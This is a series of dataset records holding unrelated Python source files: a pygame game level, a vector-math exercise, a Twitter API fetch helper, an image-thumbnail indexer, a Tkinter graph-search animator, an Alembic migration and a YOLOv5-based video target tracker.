'DNR'}\n\n self.obstacles = items.createObstacles(self.obstacleCoords)\n self.sink = items.getSink(self.obstacles)\n\n enemyStartX, enemyStartY = enemy.createPoints()\n wolf = levelEnemy((enemyStartX, enemyStartY),wolfPath,10)\n wolf1 = enemy.Enemy((enemyStartX, enemyStartY),wolfPath,7)\n bear = enemy.Enemy((enemyStartX, enemyStartY),bearPath,9)\n wolf2 = enemy.Enemy((enemyStartX, enemyStartY),wolfPath,10)\n bear2 = enemy.Enemy((enemyStartX, enemyStartY),bearPath,11)\n wolf3 = enemy.Enemy((enemyStartX, enemyStartY),wolfPath,3)\n bear3 = enemy.Enemy((enemyStartX, enemyStartY),bearPath,12)\n \n self.enemies = [wolf,wolf1,bear,wolf2,wolf3,bear,bear2,bear3]\n self.background = backgrounds.Background(2)\n\n def updateEnemies(self,keith,keys,crystalList,disabled,obstacles):\n keith.updateInvincible()\n if disabled == []:\n collision = False\n else:\n collision = False\n for pressed in disabled:\n if keys[pressed]:\n collision = True\n for e in self.enemies:\n\n if e.rectangle.colliderect(self.sink.rect):\n e.reverseHeading(self.sink)\n bumped = True\n else:\n bumped = False\n\n e.update(keith,self.background,keys,collision,obstacles,bumped)\n\n if(e.rectangle.colliderect(keith.rectangle) and keith.isInvincible == False):\n\n self.soundFX.playBloop()\n e.caughtHim = 1\n keith.onEnemyCollision()\n\n\n if(keith.itemsHeld > 0):\n keith.itemsHeld -= 1\n keith.updateSpeed()\n droppedBox = pygame.Rect((keith.rectangle.x - 1000 - 
self.background.x), (keith.rectangle.y -1000 - self.background.y), 41,36)\n droppedItem = items.Crystal(droppedBox)\n crystalList.append(droppedItem)\n else:\n keith.lives -= 1\n\n def draw(self,crystalList,sink,keith):\n self.screen.fill(colors['black'])\n self.background.draw(self.screen)\n self.drawEnemies(self.enemies)\n self.drawObstacles(self.obstacles,self.background)\n self.drawItems(crystalList,sink,self.background)\n self.drawText(keith,sink)\n self.drawDisplay(crystalList,sink,self.background)\n self.screen.blit(keith.image, keith.rectangle)\n\n\nclass vector():\n def __init__(self,x,y):\n self.x = x\n self.y = y\n\n def negateX(self):\n self.x *= -1\n\n def negateY(self):\n self.y *= -1\n\nclass levelEnemy(enemy.Enemy):\n\n def update(self,keith,bg,keys,collision,obstacles,bumped):\n if not collision:\n if keys[pygame.K_a]:\n self.rectangle.x += keith.speed\n if keys[pygame.K_d]:\n self.rectangle.x -= keith.speed\n if keys[pygame.K_w]:\n self.rectangle.y += keith.speed\n if keys[pygame.K_s]:\n self.rectangle.y -= keith.speed\n\n if self.detection.colliderect(keith.rectangle) and not bumped:\n self.chase(keith.rectangle)\n else:\n self.patrol(bg,obstacles)\n self.caughtHim = 0\n self.detection = self.rectangle.inflate(200,200)\n\n \n def chase(self,playerRect):\n \n if self.caughtHim == 1:\n self.rampage = 0\n self.detection = self.rectangle.inflate(400,300)\n return\n\n if self.rampage == 0:\n # increase detection range\n self.detection = self.rectangle.inflate(400,300)\n\n x = (playerRect.x - self.rectangle.x)\n y = (playerRect.y - self.rectangle.y)\n \n length = math.sqrt((x*x)+(y*y))\n try:\n self.headingX = float(x/length)\n except ZeroDivisionError:\n self.headingX = float(x/(length+1))\n try:\n self.headingY = float(y/length)\n except ZeroDivisionError:\n self.headingY = float(y/(length + 1))\n\n self.rampage = 1\n\n else:\n self.detection = self.rectangle.inflate(400,300)\n x = (playerRect.x - self.rectangle.x)\n y = (playerRect.y - self.rectangle.y)\n rampageSpeed = self.speed*1.7\n self.stepCounter-=1\n nextXPos = self.rectangle.x + (rampageSpeed*self.headingX)\n nextYPos = self.rectangle.y + (rampageSpeed*self.headingY)\n\n self.rectangle.x = nextXPos\n self.rectangle.y = nextYPos\n\n if y > 0: # player below\n self.move(self.down_states)\n elif y < 0: # player above\n self.move(self.up_states)\n elif x > 0: # player to right\n self.move(self.right_states)\n elif x < 0: # player to left\n self.move(self.left_states)\n \n if self.stepCounter <= 0:\n\n self.rampage = 0\n self.stepCounter = 50\n return \n\n self.image = self.sheet.subsurface(self.sheet.get_clip())\n\n","repo_name":"sabrinagannon/space-evaders","sub_path":"current version/levels/level2.py","file_name":"level2.py","file_ext":"py","file_size_in_byte":5923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9906870050","text":"\"\"\" a program to do basic vector calculations in 3 dimensions: addition, \r\ndot product and normalization\r\nAuthor: Dominic Manthoko\r\n21 April 2014\r\n\"\"\"\r\n\r\ndef v_add(A,B):\r\n \"\"\" function that adds two vectors together\"\"\"\r\n \r\n # sum the corresponding vector components together\r\n x_com = int(A[0]) + int(B[0])\r\n y_com = int(A[1]) + int(B[1])\r\n z_com = int(A[2]) + int(B[2])\r\n \r\n # add all the component additions\r\n add = [x_com, y_com, z_com]\r\n \r\n return add\r\n\r\ndef dot_product(A,B):\r\n \"\"\" function that calculates the dot product of two vectors \"\"\"\r\n \r\n # multiply the 
corresponding vector components\r\n x_com = int(A[0]) * int(B[0])\r\n y_com = int(A[1]) * int(B[1])\r\n z_com = int(A[2]) * int(B[2])\r\n \r\n mul = x_com + y_com + z_com\r\n \r\n return mul\r\n\r\n# need the math module in order to find the square root of something in the \r\n# v_norm function\r\nimport math\r\n\r\ndef v_norm(V):\r\n \"\"\" function to calculate the norm of a single vector \"\"\"\r\n \r\n # raise each vector component to the power of 2\r\n x_com = int(V[0]) ** 2\r\n y_com = int(V[1]) ** 2\r\n z_com = int(V[2]) ** 2\r\n \r\n # find the root of the sum of the vector components squared\r\n norm = math.sqrt(x_com + y_com + z_com)\r\n \r\n return norm\r\n\r\ndef main():\r\n # prompt the user to enter two vectors\r\n A = input(\"Enter vector A: \\n\")\r\n A = A.split()\r\n \r\n B = input(\"Enter vector B: \\n\")\r\n B = B.split()\r\n \r\n print('A+B = {}'.format(v_add(A,B)))\r\n print('A.B = {}'.format(dot_product(A,B)))\r\n print('|A| = {0:0.2f}'.format(v_norm(A)))\r\n print('|B| = {0:0.2f}'.format(v_norm(B)))\r\n \r\nif __name__ == '__main__' :\r\n main()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/mntdom001/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43937715875","text":"import requests\nimport os\nimport json\nimport pandas as pd\nimport time\nimport glob\nfrom twitter_scraper import cred\n\n#start_time=2020-05-25T17:00:00Z\n#end_time=2021-12-07T01:00:00Z\ndef create_url(start_time,end_time,user_id,next_token):\n # Replace with user ID below\n if next_token==None:\n return \"https://api.twitter.com/2/users/{}/tweets?max_results=100&start_time={}&end_time={}\".format(user_id,start_time,end_time)\n else:\n return \"https://api.twitter.com/2/users/{}/tweets?max_results=100&start_time={}&end_time={}&pagination_token={}\".format(user_id,start_time,end_time,next_token)\n\n \ndef get_params(paramlist=None):\n # Tweet fields are adjustable.\n # Options include:\n # attachments, author_id, context_annotations,\n # conversation_id, created_at, entities, geo, id,\n # in_reply_to_user_id, lang, non_public_metrics, organic_metrics,\n # possibly_sensitive, promoted_metrics, public_metrics, referenced_tweets,\n # source, text, and withheld\n if paramlist:\n params = \",\".join(paramlist)\n else:\n params = \"created_at,entities,in_reply_to_user_id,lang,public_metrics,source,author_id\"\n return {\"tweet.fields\": params}\n\n\ndef create_headers():\n bearer_token = cred.bearer_token\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n\ndef connect_to_endpoint(url, headers, params):\n response = requests.request(\"GET\", url, headers=headers, params=params)\n print(response.status_code)\n if response.status_code != 200:\n raise Exception(\n \"Request returned an error: {} {}\".format(\n response.status_code, response.text\n )\n )\n return response.json()\n\n","repo_name":"shrutiphadke/adversarial_IN","sub_path":"twitter_scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26169862291","text":"#!/usr/bin/python\n# coding:utf-8\n\nimport os\nimport glob\nfrom PIL import Image\nimport colorsys\nimport math\nfrom tools import deserialization, serialization, rgb_to_10\nfrom db import createDB\n\n\ndef get_dominant_color(image):\n\n # 
Convert the color mode so that RGB color values can be read\n # image = image.convert('RGBA')\n\n image = image.resize((10, 10))\n color = image.getpixel((0, 0))\n return color\n # Generate a thumbnail to reduce computation and CPU load\n # image.thumbnail((200, 200))\n\n # max_score = 0 # the original code used None here\n # # The original code used None here but crashed at runtime; changing it to 0 made it run, because in the score > max_score comparison below the initial type of max_score was undefined\n # dominant_color = 0\n\n # for count, (r, g, b, a) in image.getcolors(image.size[0] * image.size[1]):\n # # skip pure black\n # if a == 0:\n # continue\n\n # saturation = colorsys.rgb_to_hsv(r / 255.0, g / 255.0, b / 255.0)[1]\n\n # y = min(abs(r * 2104 + g * 4130 + b * 802 + 4096 + 131072) >> 13, 235)\n\n # y = (y - 16.0) / (235 - 16)\n\n # # ignore highlight colors\n # if y > 0.9:\n # continue\n\n # # Calculate the score, preferring highly saturated colors.\n # # Add 0.1 to the saturation so we don't completely ignore grayscale\n # # colors by multiplying the count by zero, but still give them a low\n # # weight.\n # score = (saturation + 0.1) * count\n\n # if score > max_score:\n # max_score = score\n # dominant_color = (r, g, b)\n\n # return dominant_color\n\n\ndef cutFile(filePath):\n im = Image.open(filePath).convert('RGB')\n img_size = im.size\n\n w = img_size[0]\n h = img_size[1]\n\n x = 0\n y = 0\n vw = h if w > h else w\n vh = vw\n # print("Trying crop width {0}, height {1}".format(vw, vh))\n x = w/4\n y = h/4\n # print("x:{0},y:{1}".format(x, y))\n\n x = 0 if (x+vw) > w else x\n y = 0 if (y+vh) > h else y\n # print("After correction, x:{0},y:{1}".format(x, y))\n # print("Trying crop width {0}, height {1}".format(vw, vh))\n\n reg = im.crop((x, y, x+vw, y+vh))\n # reg.show()\n return reg\n\n\n(conn, c) = createDB()\n\n\ndef insertToDB(row):\n c.execute("INSERT INTO images VALUES ({0},{1},{2},'{3}',{4},{5},{6},'{7}','{8}')".format(row['r'],\n row['g'],\n row['b'],\n row['path'],\n row['color'],\n row['width'],\n row['height'],\n row['name'],\n row['originPath']))\n pass\n\n\ndef originalProcess(path, thumbPath):\n i = 0\n if not os.path.exists(thumbPath):\n os.mkdir(thumbPath)\n\n for folder in os.listdir(path):\n t_folder = thumbPath+"/"+folder\n if not os.path.exists(t_folder):\n os.mkdir(t_folder)\n\n print('Processing {}...'.format(folder))\n\n for infile in glob.glob(sourcesFolder+"/"+folder+"/*.*"):\n f, ext = os.path.splitext(infile)\n try:\n img = cutFile(infile)\n img = img.resize(size)\n color = get_dominant_color(img)\n # print("Image color value: {}".format(color))\n\n t_save_file = t_folder+"/"+str(i)+'.jpg'\n\n p = Image.new('RGB', [50, 20], color)\n # img.paste(p, (5, 5)) tinting disabled\n\n # p.save(t_folder+"/"+str(i)+".c.jpg")\n img.save(t_save_file, "JPEG")\n\n colorStorage.append({'color': color, 'path': t_save_file})\n\n insertToDB({\n 'r': color[0],\n 'g': color[1],\n 'b': color[2],\n 'color': rgb_to_10(color),\n 'width': img.width,\n 'height': img.height,\n 'path': t_save_file,\n 'name': folder,\n 'originPath': infile\n })\n\n except Exception as e:\n print("Error: failed to read file: %s %s" % (infile, e))\n\n i += 1\n\n\nsize = (300, 300) # size of the generated thumbnails\n\nsourcesFolder = "downloads/sources"\nthumbnailFolder = "downloads/thumbnail"\n\ncolorStorage = deserialization('color-mapping.pkl')\n\nif(len(colorStorage) > 0):\n print('Cache found: {} images'.format(len(colorStorage)))\nelse:\n originalProcess(sourcesFolder, thumbnailFolder)\n print('Got {} images, generating cache and inserting into the database'.format(len(colorStorage)))\n serialization(colorStorage, 'result/color-mapping.pkl')\n\n for row in c.execute("select count(*) from images"):\n print(row)\n\n conn.commit()\n conn.close()\n\n\nprint("完成! 
一共有{0}个图片\".format(len(colorStorage)))\n","repo_name":"Restry/python-image-detect","sub_path":"createImageThumb.py","file_name":"createImageThumb.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2006905096","text":"\n##\n## CS 4222/5222 Artificial Intelligence\n## Fall 2021\n##\n## Lab 2: path finding. This is the animation module for the graph\n## search algorithms\n##\n##\n\nimport math\nimport pickle\nfrom tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.messagebox import showerror\nfrom time import time, sleep\n\n\nfrom SearchProblem import *\n\n## spherical Mercator projection of lat/lon coords\ndef merc(coords,mapw,maph):\n x = (coords[1]+180)*(mapw/360.0)\n latRad = coords[0]*math.pi/180.0\n mercN = math.log(math.tan((math.pi/4.0)+(latRad/2.0)))\n y = maph/2.0 - (maph*mercN)/(2.0*math.pi)\n return (x,y)\n\n## transform coordinates from graph locations to fit on canvas\n## margin is pixels of padding from canvas bounding box\ndef transform(coords,graph,canvas):\n margin=50 \n wfactor = canvas.winfo_reqwidth() - 2*margin\n hfactor = canvas.winfo_reqheight() - 2*margin\n\n if graph.geo:\n maxproj = merc((graph.xmax,graph.ymax),wfactor,hfactor)\n minproj = merc((graph.xmin,graph.ymin),wfactor,hfactor)\n x,y = merc(coords,wfactor,hfactor)\n rx = wfactor/(maxproj[0]-minproj[0])\n ry = hfactor/(maxproj[1]-minproj[1])\n return (rx*(x-minproj[0])+margin,hfactor-ry*(y-minproj[1])+margin)\n else:\n x,y = coords\n rx = wfactor/(graph.xmax-graph.xmin)\n ry = hfactor/(graph.ymax-graph.ymin) \n return (rx*(x-graph.xmin)+margin,hfactor-ry*(y-graph.ymin)+margin)\n\nclass SearchAnimator:\n def __init__(self,algos):\n self.algos = algos\n \n ## Draw the graph on the main canvas\n def draw(self,graph):\n for v in graph.nodes():\n x1,y1 = transform(graph.locations[v],graph,self.canvas)\n for u in graph.dict[v]:\n x2,y2 = transform(graph.locations[u],graph,self.canvas)\n self.canvas.create_line(x1,y1,x2,y2)\n for node in graph.locations:\n x,y = transform(graph.locations[node],graph,self.canvas)\n self.canvas.create_rectangle( x-1, y-1, x+1, y+1, fill = \"gray\" )\n if len(graph.nodes()) < 50: self.canvas.create_text(x-2,y-2,text=node)\n\n ## Trace the path (list of nodes) in red on the canvas\n def draw_path(self,graph,path):\n coords = list(map(lambda v: transform(graph.locations[v.state],graph,self.canvas),path))\n x,y = coords[0]\n self.canvas.create_rectangle( x-3, y-3, x+3, y+3, fill = \"red\" )\n for xnext,ynext in coords[1:]:\n self.canvas.create_line(x,y,xnext,ynext,width=4,fill=\"red\")\n x,y = xnext,ynext\n\n ## Retrieve the solution from the path, calculate its cost and display\n def get_solution(self,graph,path):\n cost=0;\n statePath = list(map(lambda v: v.state,path))\n statePath.reverse()\n for i in range(len(statePath)-1):\n cost = cost+graph.get(statePath[i],statePath[i+1])\n self.pathCostStr.set(str(cost))\n\n ## Mark all the nodes in the fringe set with blue\n def draw_fringe(self,graph,fringe):\n coords = map(lambda v: graph.locations[v.state],fringe)\n for x,y in coords:\n x,y = transform((x,y),graph,self.canvas)\n self.canvas.create_rectangle( x-3, y-3, x+3, y+3, fill = \"blue\" )\n\n ## Mark all the nodes in the closed set with black\n def draw_closed(self,graph,closed):\n coords = list(map(lambda state: transform(graph.locations[state],graph,self.canvas),closed))\n for x,y in coords:\n self.canvas.create_rectangle( x-3, y-3, x+3, y+3, fill = 
\"black\" )\n\n ## Display the number of nodes generated since search began\n def display_nodecount(self):\n self.nodeCountStr.set(str(Node.nodecount))\n\n ## Callback registered with search algorithm to be called in each\n ## iteration to display the search state\n def callback(self,graph,node,fringe,closed,halt):\n self.canvas.delete(\"all\")\n self.draw(graph)\n self.draw_fringe(graph,fringe)\n self.draw_path(graph,node.path())\n self.draw_closed(graph,closed)\n self.display_nodecount()\n if halt: self.get_solution(graph,node.path())\n self.root.update_idletasks()\n sleep(self.speed.get())\n\n ## Create a search problem on the graph, with initial state and goal,\n ## and run the selected search algorithm\n def run_search_alg(self,graph):\n self.speedLabel['state']=DISABLED\n self.speedSlider['state'] = DISABLED\n prob = SearchProblem(self.start.get(),self.goal.get(),graph)\n self.pathCostStr.set(\"\")\n alg = self.algos[self.algo.get()]\n alg(prob,self.callback)\n self.speedLabel['state'] = NORMAL\n self.speedSlider['state'] = NORMAL\n\n def loadInstance(self):\n filename = askopenfilename() # show an \"Open\" dialog box and return the path to the selected file\n with open(filename,'rb') as f: self.graph= pickle.load(f)\n f.close()\n\n ## compute bounding box corners\n self.graph.xmin = min([x for (x,y) in self.graph.locations.values()])\n self.graph.xmax = max([x for (x,y) in self.graph.locations.values()])\n self.graph.ymin = min([y for (x,y) in self.graph.locations.values()])\n self.graph.ymax = max([y for (x,y) in self.graph.locations.values()])\n\n ## Populate menus\n self.startNodeMenu['menu'].delete(0,'end')\n self.startNodeMenu['state']=NORMAL\n self.startNodeLabel['state']=NORMAL\n for node in self.graph.nodes():\n self.startNodeMenu['menu'].add_command(label=node, command=lambda x=node:self.start.set(x))\n self.start.set(self.graph.default_start)\n self.goalNodeMenu['menu'].delete(0,'end')\n self.goalNodeMenu['state']=NORMAL\n self.goalNodeLabel['state']=NORMAL\n for node in self.graph.nodes():\n self.goalNodeMenu['menu'].add_command(label=node, command=lambda x=node:self.goal.set(x))\n self.goal.set(self.graph.default_goal)\n self.canvas.delete(\"all\")\n self.draw(self.graph)\n self.go.configure(command=lambda x=self.graph:self.run_search_alg(self.graph))\n self.go['state'] = NORMAL\n\n def run(self):\n ## Initialize environment\n self.root = Tk()\n windowWidth = 1200\n windowHeight = 700\n positionRight = int(self.root.winfo_screenwidth()/2 - windowWidth/2)\n positionDown = int(self.root.winfo_screenheight()/2 - windowHeight/2)\n\n # Positions the window in the center of the page.\n self.root.geometry(\"{}x{}\".format(windowWidth, windowHeight) + \"+{}+{}\".format(positionRight, positionDown))\n self.root.title( \"Search Animator\" )\n\n ## Set up canvas for input window\n self.canvas = Canvas( self.root, width=windowWidth-300, height=windowHeight )\n self.canvas.place(x=0,y=0)\n\n ## Set up canvas for control panel\n controlFrame = Frame(self.root, height=windowHeight-180,width=275,borderwidth=2,relief=SUNKEN)\n controlFrame.place(x=900,y=200/2);\n controlFrame.propagate(0)\n self.control = Canvas(controlFrame)\n self.control.pack(expand=YES,fill=BOTH)\n\n\n ## Start node menu (this needs to be populated after load)\n self.start = StringVar(self.root)\n self.startNodeMenu = OptionMenu(self.control,self.start,None)\n self.startNodeMenu.grid(row=2,column=2,sticky=W,padx=5,pady=5)\n self.startNodeLabel = Label(self.control,text=\"Start:\")\n 
self.startNodeLabel.grid(row=2,column=1,sticky=E,padx=5,pady=5)\n self.startNodeMenu[\"state\"]=DISABLED\n self.startNodeLabel[\"state\"]=DISABLED\n\n ## Goal node menu (this needs to be populated after load)\n self.goal = StringVar(self.root)\n self.goalNodeMenu = OptionMenu(self.control,self.goal,None)\n self.goalNodeMenu.grid(row=3,column=2,sticky=W,padx=5,pady=5)\n self.goalNodeLabel = Label(self.control,text=\"Goal:\")\n self.goalNodeLabel.grid(row=3,column=1,sticky=E,padx=5,pady=5)\n self.goalNodeMenu[\"state\"]=DISABLED\n self.goalNodeLabel[\"state\"]=DISABLED\n\n ## Algo menu\n #self.algos = [\"graph search\", \"BFS\", \"DFS\", \"greedy best-first\", \"A*\", \"IDS\"]\n\n ## self.algos is a dictionary of search functions keyed by string\n self.algo = StringVar(self.root)\n self.algo.set(list(self.algos.keys())[0])\n self.algoMenu = OptionMenu(self.control,self.algo,*self.algos.keys())\n self.algoMenu.grid(row=4,column=2,sticky=W,padx=5,pady=5)\n Label(self.control,text=\"Algo:\").grid(row=4,column=1,sticky=E,padx=5,pady=5)\n\n self.graph=None\n\n ## Go button\n self.go = Button(self.control,text=\"Go\",width=10)\n self.go.grid(row=1,column=1,sticky='w',padx=5,pady=5)\n self.go[\"state\"] = DISABLED\n self.go.propagate(0)\n\n ## Load button\n self.load = Button(self.control,text='Load',width=10,command=self.loadInstance)\n self.load.grid(row=1,column=2,sticky='w',padx=5,pady=5)\n self.load.propagate(0)\n\n ## Nodes generated display\n self.nodeCountStr = StringVar(self.root)\n Label(self.control,text=\"Nodes generated:\").grid(row=5,column=1,sticky=E,padx=5,pady=5)\n Label(self.control,textvariable=self.nodeCountStr).grid(row=5,column=2,sticky=W,padx=5,pady=5)\n self.nodeCountStr.set(\"0\")\n\n ## Solution cost display\n self.pathCostStr = StringVar(self.root)\n Label(self.control,text=\"Solution cost:\").grid(row=6,column=1,sticky=E,padx=5,pady=5)\n Label(self.control,textvariable=self.pathCostStr).grid(row=6,column=2,sticky=W,padx=5,pady=5)\n self.pathCostStr.set(\"\")\n\n self.speed = DoubleVar(self.root)\n self.speedLabel = Label(self.control,text=\"Speed:\")\n self.speedSlider = Scale(self.control,from_=1,to=0.01,resolution=0.01,variable=self.speed,orient=HORIZONTAL,\n showvalue=False)\n self.speed.set(1)\n self.speedLabel.grid(row=7,column=1,sticky=E,padx=5,pady=5)\n self.speedLabel.propagate(0)\n self.speedSlider.grid(row=7,column=2,sticky=W,padx=5,pady=5)\n self.speedSlider.propagate(0)\n\n self.root.mainloop()\n\n","repo_name":"joseoliveirajr/ai-labs","sub_path":"lab-2/SearchAnimator.py","file_name":"SearchAnimator.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27979516685","text":"\"\"\"Criação da tabela Token\n\nRevision ID: 2c1f48dfecb6\nRevises: 48939ecf5a5d\nCreate Date: 2021-04-19 22:43:19.241253\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2c1f48dfecb6'\ndown_revision = '48939ecf5a5d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('token',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('nome', sa.String(length=100), nullable=False),\n sa.Column('token', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('token')\n # ### end Alembic commands ###\n","repo_name":"brunopetinati/Capstone-Q3","sub_path":"migrations/versions/2c1f48dfecb6_criação_da_tabela_token.py","file_name":"2c1f48dfecb6_criação_da_tabela_token.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28215548050","text":"import os\nimport time\nfrom queue import Queue\n\nimport cv2\nimport numpy\n\nfrom detector import Detector\nfrom extractor import Extractor\nfrom yolov5.utils.plots import plot_one_box\n\n\nclass Tracker():\n def __init__(self, args):\n self.detector = Detector(weight=args.yolov5_weight, persist=True)\n\n self.extractor = Extractor(weight=args.feature_net_weight, arch=args.feature_net_arch)\n self.feature_net_arch = args.feature_net_arch\n\n self.input_path = os.path.join(args.input_path)\n filename = os.path.basename(self.input_path)\n self.output_path = os.path.join(args.output_path, str(args.threshold1) + "," + str(args.threshold2) + "," + str(\n args.threshold3) + "," + str(args.threshold4))\n if not os.path.exists(self.output_path):\n os.makedirs(self.output_path)\n self.output_path = os.path.join(self.output_path, filename)\n self.threshold1 = args.threshold1\n self.threshold2 = args.threshold2\n self.threshold3 = args.threshold3\n self.threshold4 = args.threshold4\n\n self.video_type_dict = {\n ".mp4": "mp4v",\n ".avi": "pimi",\n ".ogv": "theo",\n ".fly": "flv1"\n }\n\n self.target_img_path = args.target_img_path\n self.positive_feature_buffer_maximum = 20\n # positive-sample buffer\n self.positive_feature_buffer = None\n # original positive-sample feature; it takes priority over every sample in the buffer\n self.positive_feature0 = None\n\n def compute_distance(self, features, type=0):\n """\n Compute the weighted average distance between the detected targets and every sample in the positive-sample buffer.\n 0. Uniform-weight mode:\n all samples are weighted equally\n 1. Increasing-weight mode:\n favors target continuity in smooth shots, but one bad detection can gradually amplify the error afterwards.\n 2. Decreasing-weight mode:\n favors re-association after abrupt shot changes, but links targets in smooth shots less well than mode 1\n The original image feature is always used in the distance computation.\n :param features: detected-target features\n :param type: weighting mode\n :return: distance to the original positive sample, weighted distance to the positive-sample buffer\n """\n\n ############################### distance to the original positive sample ###########################################\n distance0 = features - self.positive_feature0\n distance0 = distance0 ** 2\n distance0 = numpy.sum(distance0, axis=1)\n\n ############################### weighted distance to the positive-sample buffer ###########################################\n if type == 0:\n weights_matrix = [[1] for weight in range(1, len(self.positive_feature_buffer) + 1)]\n elif type == 1:\n weights_matrix = [[weight] for weight in range(1, len(self.positive_feature_buffer) + 1)]\n else:\n weights_matrix = [[weight] for weight in range(len(self.positive_feature_buffer), 0, -1)]\n\n # weight matrix\n coefficient = 1\n weights_matrix = numpy.array(weights_matrix) ** coefficient\n\n distances = []\n for positive_feature in self.positive_feature_buffer:\n distance = features - positive_feature\n distance = distance ** 2\n distance = numpy.sum(distance, axis=1)\n distances.append(distance[None])\n distances = numpy.concatenate(distances, axis=0)\n distances = distances * weights_matrix\n\n if type == 0:\n average_distance_with_weights = numpy.sum(distances, axis=0) / len(self.positive_feature_buffer)\n else:\n count = 0\n for i in range(1, len(self.positive_feature_buffer) + 1):\n count += i ** coefficient\n average_distance_with_weights = numpy.sum(distances, axis=0) / count\n\n return distance0, average_distance_with_weights\n\n def track(self):\n cap = cv2.VideoCapture(self.input_path)\n\n input_fps = cap.get(cv2.CAP_PROP_FPS)\n video_length = 
int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n ret, frame = cap.read()\n\n ending_frame = 100\n ending_frame = video_length\n\n output_fps = input_fps / 1\n video_type = os.path.splitext(self.output_path)[-1]\n fourcc = cv2.VideoWriter_fourcc(*self.video_type_dict.get(video_type))\n out = cv2.VideoWriter(self.output_path, fourcc, output_fps, (frame.shape[1], frame.shape[0]))\n\n current_frame = 0\n\n # image and feature of the original target\n target_img = cv2.imread(self.target_img_path)\n target_img_feature0 = self.extractor.extract([target_img, ]).cpu().detach().numpy()\n current_target_img_feature = target_img_feature0\n\n # positive-sample buffer\n self.positive_feature_buffer = current_target_img_feature\n # original positive sample\n self.positive_feature0 = target_img_feature0\n\n while cap.isOpened() and ret == True and current_frame <= ending_frame:\n tic = time.time()\n\n canvas = frame\n canvas, boxes = self.detector.detect(canvas)\n\n sub_canvases = []\n\n for i, box in enumerate(boxes):\n sub_canvas = canvas[box[1]:box[3], box[0]:box[2], :]\n # cv2.imwrite("images/" + str(i) + ".jpg", sub_canvas)\n sub_canvases.append(sub_canvas)\n\n """\n There are several thresholds here:\n 1. original-positive-sample tracking threshold <= 2. original-positive-sample storage threshold\n 3. positive-sample-buffer tracking threshold > 4. positive-sample-buffer storage threshold\n \n """\n\n # if self.feature_net_arch == "resnet18":\n # threshold1 = 0.4\n # threshold2 = 0.4\n # threshold3 = 0.65\n # threshold4 = 0.2\n # else:\n # threshold1 = 0.7\n # threshold2 = 0.3\n # threshold3 = 0.4\n # threshold4 = 0.2\n\n threshold1 = self.threshold1\n threshold2 = self.threshold2\n threshold3 = self.threshold3\n threshold4 = self.threshold4\n\n # only compute feature distances when at least one target was detected\n if len(sub_canvases) > 0:\n features = self.extractor.extract(sub_canvases).cpu().detach().numpy()\n # distances_list = (distance to the original positive sample, weighted distance to the positive-sample buffer)\n distances_list = self.compute_distance(features)\n\n positive_feature0_nearest_distance = numpy.min(distances_list[0])\n positive_feature0_offset = numpy.argmin(distances_list[0], axis=0)\n\n # below threshold1 the original positive sample is a direct match: track the closest target\n if positive_feature0_nearest_distance < threshold1:\n current_target_img_feature = features[positive_feature0_offset][None]\n # below threshold2 the target's feature is also added to the positive-sample buffer\n if positive_feature0_nearest_distance < threshold2:\n self.positive_feature_buffer = numpy.concatenate(\n (self.positive_feature_buffer, current_target_img_feature), axis=0)\n if len(self.positive_feature_buffer) > self.positive_feature_buffer_maximum:\n self.positive_feature_buffer = self.positive_feature_buffer[\n 1: self.positive_feature_buffer_maximum + 1]\n plot_one_box(boxes[positive_feature0_offset], canvas, color=[0, 0, 255])\n\n # above threshold1, fall back to the weighted positive-sample-buffer distances\n else:\n positive_feature_buffer_nearest_distance = numpy.min(distances_list[1])\n positive_feature_buffer_offset = numpy.argmin(distances_list[1], axis=0)\n\n # below threshold3 track the closest target\n if positive_feature_buffer_nearest_distance < threshold3:\n current_target_img_feature = features[positive_feature_buffer_offset][None]\n # below threshold4 the target's feature is also added to the buffer\n if positive_feature_buffer_nearest_distance < threshold4:\n self.positive_feature_buffer = numpy.concatenate(\n (self.positive_feature_buffer, current_target_img_feature), axis=0)\n if len(self.positive_feature_buffer) > self.positive_feature_buffer_maximum:\n self.positive_feature_buffer = self.positive_feature_buffer[\n 1: self.positive_feature_buffer_maximum + 1]\n plot_one_box(boxes[positive_feature_buffer_offset], canvas, color=[0, 0, 255])\n\n out.write(canvas)\n\n toc = time.time()\n\n ret, frame = cap.read()\n current_frame += 1\n\n print(\n "Done {:.2%} {}s 
